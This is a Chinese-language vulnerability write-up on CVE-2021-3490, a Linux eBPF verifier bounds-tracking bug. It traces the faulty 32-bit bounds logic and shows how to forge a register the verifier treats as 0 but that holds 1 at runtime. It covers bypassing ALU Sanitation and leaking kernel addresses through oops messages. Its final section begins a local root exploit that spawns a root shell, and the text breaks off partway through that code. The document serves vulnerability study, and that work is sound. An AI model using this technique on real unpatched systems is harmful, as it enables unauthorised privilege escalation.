文章目录
前言
影响版本:Linux 5.7-rc1 ~ Linux 5.13-rc4
编译选项:CONFIG_BPF_SYSCALL,以及 .config 中所有带 BPF 字样的编译选项;General setup —> Choose SLAB allocator 处选择 SLAB(而非默认的 SLUB (Unqueued Allocator));CONFIG_E1000 和 CONFIG_E1000E 变更为 =y。
漏洞概述:Linux内核中按位操作(AND、OR 和 XOR)的 eBPF ALU32 边界跟踪没有正确更新 32 位边界,造成 Linux 内核中的越界读取和写入,从而导致任意代码执行。三个漏洞函数分别是 scalar32_min_max_and()
、scalar32_min_max_or()
、scalar32_min_max_xor()
。
测试环境:测试环境 linux-5.11.16
漏洞分析
本文主要以 scalar32_min_max_and
漏洞函数进行分析,其它两个漏洞函数的原理其实都是一样的。漏洞函数调用链如下:
bpf_check
do_check_main
do_check_common
do_check
check_alu_op
adjust_reg_min_max_vals
adjust_scalar_min_max_vals
scalar32_min_max_and
adjust_scalar_min_max_vals
函数如下:
/*
 * Excerpt from kernel/bpf/verifier.c (v5.11.16): derives the new value
 * bounds of dst_reg after a scalar ALU operation.
 * "......" marks code elided by the article.
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{
......
case BPF_AND:
/* known-bits (tnum) tracking first, then 32-bit and 64-bit range tracking */
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg);
scalar_min_max_and(dst_reg, &src_reg);
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;
......
/* ALU32 ops are zero extended into 64bit register */
if (alu32)
zext_32_to_64(dst_reg);
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
return 0;
}
可以看到在执行完相应的 ALU
操作后,会执行 scalar32_min_max_XXX/scalar_min_max_XXX
函数计算 32/64 位边界,其中scalar32_min_max_and
函数如下:
/*
 * Vulnerable function (CVE-2021-3490): tracks the 32-bit bounds of
 * dst_reg after a BPF_AND.
 */
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
// BUG: when both low 32-bit halves are known constants, return without
// updating the 32-bit bounds, wrongly assuming the 64-bit path fixes them
if (src_known && dst_known)
return;
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
可以看到在 scalar32_min_max_and
函数,如果两个寄存器的低 32 位值都是 known
的就直接跳过,因为其认为在 64 位中会做相应的调整,scalar_min_max_and
函数如下:
/*
 * 64-bit bound tracking for BPF_AND; the inline annotations show the
 * register state for the article's example.
 */
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}
bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 1, mask = 0x100000000 }
s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002
u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002
// only when the full 64-bit values are known is the register marked as
// a known constant (which would also refresh the 32-bit bounds)
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}
dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 1
dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002
if (dst_reg->smin_value < 0 || smin_val < 0) {
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg);
}
__mark_reg_known
函数的逻辑很简单,就是设置范围为一个常数:
/* Pin every 64-bit AND 32-bit bound of reg to the constant imm. */
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;
reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}
/* Clear per-register metadata, then mark the register as constant imm. */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
如果两个寄存器 64 位都是已知的,那么其是不存在问题的,因为在 ___mark_reg_known
函数中更新了 32 位范围。但是 64 位不一定是已知的,即存在一种情况:两个寄存器的低 32 位是已知的,但是其高 32 位不确定。那么此时整个流程就忽略了对 32 位范围的更新。比如如下例子:
R6 = { .value = 1, .mask = 0xffffffff00000000 }
R8 = { .value = 0x100000002, mask = 0 }
我们模拟跟踪下 R6 & R8
执行过程中,寄存器值范围的变化:
/* Order of bound tracking for R6 &= R8: tnum first, then the 32/64-bit
 * range helpers, then the final bound-derivation passes. */
case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg);
scalar_min_max_and(dst_reg, &src_reg);
break
......
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
1 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
tnum_and
函数如下:
/* Bitwise AND on tnums: a result bit can only possibly be 1 if it may be
 * 1 in both operands; inline annotations trace the article's example. */
struct tnum tnum_and(struct tnum a, struct tnum b)
{
u64 alpha, beta, v;
// a = R6 = { value = 1, mask = 0xffffffff00000000 }
// b = R8 = { value = 0x100000002, mask = 0}
alpha = a.value | a.mask; // alpha = 0xffffffff00000001
beta = b.value | b.mask; // beta = 0x100000002
v = a.value & b.value; // v = 0
return TNUM(v, alpha & beta & ~v); // { value = 0, mask = 0x100000000 }
}
两个寄存器的初始状态如下:
R6
:
R8
:
所以执行完 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
后,dst_reg->var_off = { value = 0, mask = 0x100000000 }
,即其只有第 32 位是未知的
2 scalar32_min_max_and(dst_reg, &src_reg);
/* Repeated excerpt: with both low 32-bit halves constant, the early
 * return skips all 32-bit bound updates — the root cause. */
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
if (src_known && dst_known)
return;
......
}
tnum_subreg_is_const
函数就是检查寄存器的低 32 位是否已知:
/* True iff the low 32 bits of a are fully known (no unknown mask bits). */
static inline bool tnum_subreg_is_const(struct tnum a)
{
return !(tnum_subreg(a)).mask;
}
/* Return the low-32-bit sub-register view of a tnum. */
struct tnum tnum_subreg(struct tnum a)
{
return tnum_cast(a, 4);
}
/* Truncate a tnum to its low `size` bytes (value and mask alike). */
struct tnum tnum_cast(struct tnum a, u8 size)
{
a.value &= (1ULL << (size * 8)) - 1;
a.mask &= (1ULL << (size * 8)) - 1;
return a;
}
这里 dst_reg/src_reg
的低 32 位都是已知的,所以会直接返回
3 scalar_min_max_and(dst_reg, &src_reg);
/* Annotated trace of the 64-bit AND bound tracking for the exploit's
 * register state (R6 & R8). */
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}
bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 0, mask = 0x100000000 }
s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002
u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002
// dst_reg is NOT a 64-bit constant here (mask != 0), so
// __mark_reg_known is skipped and the 32-bit bounds stay stale
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}
dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 0
dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002
// dst_reg->smin_value < 0 here, so the if branch is taken
if (dst_reg->smin_value < 0 || smin_val < 0) {
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
__update_reg_bounds(dst_reg);
}
在这里 dst_reg->smin_value/smax_value
会被设置为最小值/最大值,然后执行 __update_reg_bounds(dst_reg);
:
/* Refresh both the 32-bit and 64-bit bounds from var_off. */
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
这里我们主要关注 __update_reg32_bounds(reg);
:
/* Tighten the 32-bit bounds using var_off.  With the stale bounds [1,1]
 * and var_off = { 0, 0x100000000 } this yields the impossible range
 * [1, 0] — the inconsistent state the exploit relies on. */
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);
/* min signed is max(sign bit) | min(other bits) */
// s32_min_value = max_t(s32, 1, 0) = 1
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN)); // s32_min_value = 1
/* max signed is min(sign bit) | max(other bits) */
// s32_max_value = min_t(s32, 1, 0) = 0
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX)); // s32_max_value = 0
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value); // u32_min_value = 1
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask)); // u32_max_value = 0
}
由于之前没有更新 32 位范围,所以 dst_reg
之前的 s32_min_value/s32_max_value/u32_min_value/u32_max_value
全都是 1,但是经过 AND
操作后,dst_reg
的 var_off
为 { value = 0, mask = 0x100000000 }
,所以在经过 __update_reg32_bounds
处理后,你会发现 s32_min_value = u32_min_value = 1
,而 s32_max_value = u32_max_value = 0
,即寄存器 32 位范围成了 [1, 0]
,这显然是不对的。所以漏洞的本质就是:当寄存器低 32 位已知时,没有更新寄存器低 32 位范围。然后后面 3 个函数暂时先不分析。
所以经过上述操作后,此时 R6
的寄存器状态如下:
这里我们的目的还是去构造一个寄存器 vuln reg
:其验证阶段值为0,实际运行时值为1
构造 vuln reg
这里回忆一下上述构造的 R6
寄存器的状态:
R6: var_off = { .value = 0, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 0
u32_min_value = 1, u32_max_value = 0
这时我们在构造一个寄存器 R8
,其状态如下:
R8:var_off = { .value = 0, mask = 1 } real_value = 0
s32_min_value = 0, s32_max_value = 1
u32_min_value = 0, u32_max_value = 1
R6+R8
后会执行如下操作:
/* BPF_ADD path: note that the 32/64-bit range tracking runs BEFORE
 * tnum_add here, unlike the bitwise ops. */
case BPF_ADD:
scalar32_min_max_add(dst_reg, &src_reg);
scalar_min_max_add(dst_reg, &src_reg);
dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
break;
......
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
主要我们关注的是 32 位范围,所以看下 scalar32_min_max_add
函数:
/* 32-bit bound tracking for BPF_ADD: widen to the full range on
 * signed/unsigned overflow, otherwise add the operand bounds. */
static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
s32 smin_val = src_reg->s32_min_value;
s32 smax_val = src_reg->s32_max_value;
u32 umin_val = src_reg->u32_min_value;
u32 umax_val = src_reg->u32_max_value;
if (signed_add32_overflows(dst_reg->s32_min_value, smin_val) ||
signed_add32_overflows(dst_reg->s32_max_value, smax_val)) {
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
dst_reg->s32_min_value += smin_val;
dst_reg->s32_max_value += smax_val;
}
/* unsigned overflow detected by wrap-around (sum < addend) */
if (dst_reg->u32_min_value + umin_val < umin_val ||
dst_reg->u32_max_value + umax_val < umax_val) {
dst_reg->u32_min_value = 0;
dst_reg->u32_max_value = U32_MAX;
} else {
dst_reg->u32_min_value += umin_val;
dst_reg->u32_max_value += umax_val;
}
}
这里是不存在溢出的,所以会将对于的范围边界值相加,所以相加后其 R6
状态如下:
R6:var_off = { .value = 0, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
然后执行 dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
:
/* Addition on tnums; unknown bits propagate through possible carries.
 * Inline annotations trace the article's R6 + R8 example. */
struct tnum tnum_add(struct tnum a, struct tnum b)
{
u64 sm, sv, sigma, chi, mu;
// { .value = 0, .mask = 0x1_0000_0000 } + { .value = 0, mask = 1 }
// sm = 0x1_0000_0001, sv = 0
sm = a.mask + b.mask;
sv = a.value + b.value;
sigma = sm + sv; // sigma = 0x1_0000_0001
chi = sigma ^ sv; // chi = 0x1_0000_0001
mu = chi | a.mask | b.mask; // mu = 0x1_0000_0001
return TNUM(sv & ~mu, mu); // { 0, 0x1_0000_0001 }
}
所以执行完 tnum_add
后 R6
的状态为:
R6:var_off = { .value = 0, .mask = 0x1_0000_0001 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
然后 __update_reg_bounds(dst_reg);/__reg_deduce_bounds(dst_reg);
并不会对 R6
的状态产生影响,这里读者感兴趣可以自行分析一下,比较简单。主要是 __reg_bound_offset(dst_reg);
,其会将范围反馈到寄存器的值,函数定义如下:
/* Attempts to improve var_off based on unsigned min/max information */
/* Attempts to improve var_off based on unsigned min/max information */
/* Feeding the bogus 32-bit range [1, 1] back into var_off is what turns
 * the low 32 bits into the "known constant 1" the verifier trusts. */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
struct tnum var64_off = tnum_intersect(reg->var_off,
tnum_range(reg->umin_value,
reg->umax_value));
struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
tnum_range(reg->u32_min_value,
reg->u32_max_value));
reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}
这里我还是只关注 32 位范围,记住此时 R6
的状态:
R6:var_off = { .value = 0, .mask = 0x1_0000_0001 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
我们将 struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off), tnum_range(reg->u32_min_value, reg->u32_max_value));
进行拆分:
tnum_range
函数定义如下:这里传入的 min = max = 1
/* Build a tnum covering [min, max]; with min == max == 1 the result is
 * the constant tnum { value = 1, mask = 0 }. */
struct tnum tnum_range(u64 min, u64 max)
{
u64 chi = min ^ max, delta; // min = 1, max = 1 ==> chi = 0
u8 bits = fls64(chi); // bits = 0
/* special case, needed because 1ULL << 64 is undefined */
if (bits > 63)
return tnum_unknown;
delta = (1ULL << bits) - 1; // delta = 0
return TNUM(min & ~delta, delta); // { value = 1, mask = 0 }
}
所以这里 tnum_range(reg->u32_min_value, reg->u32_max_value)); = { value = 1, mask = 0 }
tnum_subreg(reg->var_off)
就不多说了,取低 32 位,所以返回的是 { value = 0, mask = 1 }
所以最后就是:struct tnum var32_off = tnum_intersect( { value = 1, mask = 0 }, { value = 0, mask = 1 }
:
/* Combine two tnums describing the same value: known bits from either
 * side are kept; only bits unknown in both stay unknown. */
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
u64 v, mu;
// a = { value = 1, mask = 0 }, b = { value = 0, mask = 1 }
v = a.value | b.value; // v = 1
mu = a.mask & b.mask; // mu = 0
return TNUM(v & ~mu, mu); // { 1, 0 }
}
所以最后 R6
寄存器的状态为:
R6:var_off = { .value = 1, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
所以可以看到最后在验证阶段,R6
的低 32 位被当作了常数1(当然这里构造了 32 位,自然就构造了 64 位,比如我们只需要 AND 1
即可),但是注意 R6/R8
在实际运行时都是0,所以 R6+R8
应当是0,所以实际运行时最后 R6
应当是0(自然低 32 位应当是0)。
所以经过上述步骤,我们成功的构造了一个在验证阶段为 1
,而在实际运行时为 0
的寄存器 R6
。但是我们需要的是在验证阶段为 0
,而在实际运行时为 1
的寄存器,所以这里似乎反了。但是解决方案比较简单,我们可以先将 R6 + 1
,这样就构造了一个验证阶段为 2
,实际运行为 1
的寄存器 R6
,然后在 AND 1
,这样就成功的构造了一个验证阶段为 0
,实际运行为 1
的寄存器 R6
了
漏洞利用
构造好了验证阶段为 0
,实际运行为 1
的寄存器之后,其利用就比较常规了。但是这里需要注意 ALU Sanitation
机制。
ALU Sanitation
ALU Sanitation
是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier
静态分析的不足,这项技术通过调用 fixup_bpf_calls()
为 eBPF
程序中的每一条指令的前面都添加上额外的辅助指令来实现。
Linux v5.11.8 – 5.11.16 版本
对于 BPF_ADD
及 BPF_SUB
这样的指令而言,会添加如下辅助指令【linux-5.11.16】:
/*
 * ALU Sanitation (v5.11.16 excerpt): for every pointer ADD/SUB the
 * verifier patches in instructions that mask the offset register at
 * runtime so it cannot exceed aux->alu_limit.
 */
static int fixup_bpf_calls(struct bpf_verifier_env *env)
{
......
for (i = 0; i < insn_cnt; i++, insn++) {
......
if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||
insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {
const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;
const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;
struct bpf_insn insn_buf[16];
struct bpf_insn *patch = &insn_buf[0];
bool issrc, isneg;
u32 off_reg;
aux = &env->insn_aux_data[i + delta];
/* only sanitize ops the verifier flagged as pointer arithmetic */
if (!aux->alu_state ||
aux->alu_state == BPF_ALU_NON_POINTER)
continue;
isneg = aux->alu_state & BPF_ALU_NEG_VALUE;
issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==
BPF_ALU_SANITIZE_SRC;
off_reg = issrc ? insn->src_reg : insn->dst_reg;
if (isneg)
*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
/* AX = alu_limit - off_reg; OR/NEG/ARSH turn AX into an all-ones
 * mask when off_reg is within [0, alu_limit], else all-zeros */
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
if (issrc) {
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX,
off_reg);
insn->src_reg = BPF_REG_AX;
} else {
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg,
BPF_REG_AX);
}
if (isneg)
insn->code = insn->code == code_add ?
code_sub : code_add;
*patch++ = *insn;
if (issrc && isneg)
*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
cnt = patch - insn_buf;
new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt);
if (!new_prog)
return -ENOMEM;
delta += cnt - 1;
env->prog = prog = new_prog;
insn = new_prog->insnsi + i + delta;
continue;
}
......
return 0;
}
其中 aux->alu_limit
为当前指针运算范围,初始时为 0,与指针所做的常量运算同步,对于减法而言可读范围为 (ptr - alu_limit, ptr]
(以指针最初指向的地址为 0),因此我们还需要绕过这个检查
由于我们有运行时为 1,verifier
认为是 0 的寄存器,我们可以这样调整范围:
- 构造另外一个同样是运行时值为 1、
verifier
认为是 0 的寄存器R8
- 将
R8
乘上一个不大于value size
的值(例如value size
为 0x1000,R8
便设为 0x1000) - 将指向
map
第一个元素第一个字节value[0]
的寄存器(假设为R7
)先加上 0x1000,此时alu_limit
变为 0x1000,R7
指向value[0x1000]
R7 -= R8
,由于verifier
认为R8
为 0,因此alu_limit
保持不变,但R7
实际上已经指回了value[0]
即通过如下指令即可绕过:
/* alu_limit bypass: R8 is 0 to the verifier but 1 at runtime, so the
 * verifier keeps alu_limit at 0x1000 while R7 really moves back to
 * value[0]. */
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),
Linux v5.11.8 之前的版本
在内核版本 5.11.8
之前 ALU Sanitation
存在一个漏洞,即 aux->alu_limit
被初始化为 0 从而导致 0-1
造成整型溢出变为一个巨大的值,在这个 commit 中才被修复,因此对于 5.11.8
之前版本的内核而言是不需要绕过该检查的
/*
 * Compute the maximum offset (alu_limit) a pointer ADD/SUB may apply,
 * based on the pointer type and the direction of the operation.
 */
static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
u32 *ptr_limit, u8 opcode, bool off_is_neg)
{
/* "mask to left": the op moves the pointer towards lower addresses */
bool mask_to_left = (opcode == BPF_ADD && off_is_neg) ||
(opcode == BPF_SUB && !off_is_neg);
u32 off;
switch (ptr_reg->type) {
case PTR_TO_STACK:
/* Indirect variable offset stack access is prohibited in
 * unprivileged mode so it's not handled here.
 */
off = ptr_reg->off + ptr_reg->var_off.value;
if (mask_to_left)
*ptr_limit = MAX_BPF_STACK + off;
else
*ptr_limit = -off;
return 0;
case PTR_TO_MAP_VALUE:
if (mask_to_left) {
*ptr_limit = ptr_reg->umax_value + ptr_reg->off;
} else {
off = ptr_reg->smin_value + ptr_reg->off;
*ptr_limit = ptr_reg->map_ptr->value_size - off;
}
return 0;
default:
return -EINVAL;
}
}
......
/* Pre-5.11.8 variant: note "aux->alu_limit - 1" below — with alu_limit
 * still 0 this wraps to 0xffffffff, effectively disabling the runtime
 * check (the bug fixed in 5.11.8). */
if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||
insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {
const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;
const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;
struct bpf_insn insn_buf[16];
struct bpf_insn *patch = &insn_buf[0];
bool issrc, isneg;
u32 off_reg;
aux = &env->insn_aux_data[i + delta];
if (!aux->alu_state ||
aux->alu_state == BPF_ALU_NON_POINTER)
continue;
isneg = aux->alu_state & BPF_ALU_NEG_VALUE;
issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==
BPF_ALU_SANITIZE_SRC;
off_reg = issrc ? insn->src_reg : insn->dst_reg;
if (isneg)
*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
......
Linux v5.11.16 之后的版本
目前最新的 ALU Sanitation
保护机制。2021年4月 ALU Sanitation
引入新的 patch—commit 7fedb63a8307,新增了两个特性。
- 一是
alu_limit
计算方法变了,不再用指针寄存器的位置来计算,而是使用offset
寄存器。例如,假设有个寄存器的无符号边界是umax_value = 1, umin_value = 0
,则计算出alu_limit = 1
,表示如果该寄存器在运行时超出边界,则指针运算不会使用该寄存器。 - 二是在
runtime
时会用立即数替换掉verifier
认定为常数的寄存器。例如,BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)
,EXPLOIT_REG
被verifier
认定为0,但运行时为1,则将该指令改为BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)
。这个补丁本来是为了防侧信道攻击,同时也阻止了CVE-2021-3490
漏洞的利用。
以下补丁可看出,如果不确定offset寄存器是否为常量,则根据其alu_limit进行检查;如果确定其为常量,则用其常量值将其操作patch为立即数指令。
/* Excerpt of commit 7fedb63a8307: offset registers the verifier proved
 * constant are replaced by immediates at patch time, which kills the
 * "verifier sees 0, runtime is 1" register trick. */
bool off_is_imm = tnum_is_const(off_reg->var_off);
alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0;
isimm = aux->alu_state & BPF_ALU_IMMEDIATE;
...
if (isimm) {
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
} else {
// Patch alu_limit check instructions
....
}
这两个新特性的引入使得本文所用的攻击方法近乎完全失效,不过这并不代表我们不能完成利用,在 D^3CTF2022-d3bpf-v2 中来自 vidar-team 的 chuj 师傅展示了一个新的技巧——由于 bpf_skb_load_bytes()
会将一个 sk_buff
的数据读到栈上,因此我们可以利用运行时为 1、verifier 确信为 0 的寄存器构造一个较长的 len
参数,从而使得数据拷贝时发生栈溢出
我们或许还需要额外的办法泄露内核地址,一个可行的方式是直接造成 kernel oops
后通过 dmesg
泄露出内核信息,这个技巧对于总会设置 oops=panic
的 CTF 题并不可用,但是大部分的真实世界环境其实都不会在 soft panic 发生时直接 panic (/proc/sys/kernel/panic_on_oops == 0
),因此这个方法的可行性其实还是挺高的
exp 及效果演示
exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"
/* Report a fatal error location (red ANSI text), pause so the message is
 * readable, then terminate the exploit with a failure status. */
void err_exit(char *msg)
{
    fprintf(stdout, "\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(2);
    exit(EXIT_FAILURE);
}
/* Print an informational message in bold magenta. */
void info(char *msg)
{
    fprintf(stdout, "\033[35m\033[1m[+] %s\n\033[0m", msg);
}
/* Print a labelled value in hexadecimal (bold green label). */
void hexx(char *msg, size_t value)
{
    fprintf(stdout, "\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}
/* Hex-dump `len` bytes at `addr`: rows of four qwords plus an ASCII
 * column, with an optional yellow heading.
 * NOTE(review): the padding format strings (`" %04x"`, the short-row
 * `printf(" ")`, the column separator) appear to have lost repeated
 * spaces when the article was extracted — verify against the original
 * source before reuse. */
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
/* root checker and shell poper */
void get_root_shell(void)
{
if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(2);
exit(EXIT_FAILURE);
}
puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
system("/bin/sh");
/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}
/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
/* Thin wrapper around the raw bpf(2) syscall (no glibc stub assumed). */
static inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}
/* Create a BPF map; returns the new map fd or a negative error. */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};
return bpf(BPF_MAP_CREATE, &attr);
}
/* Copy the element at *key out of the map into *value. */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
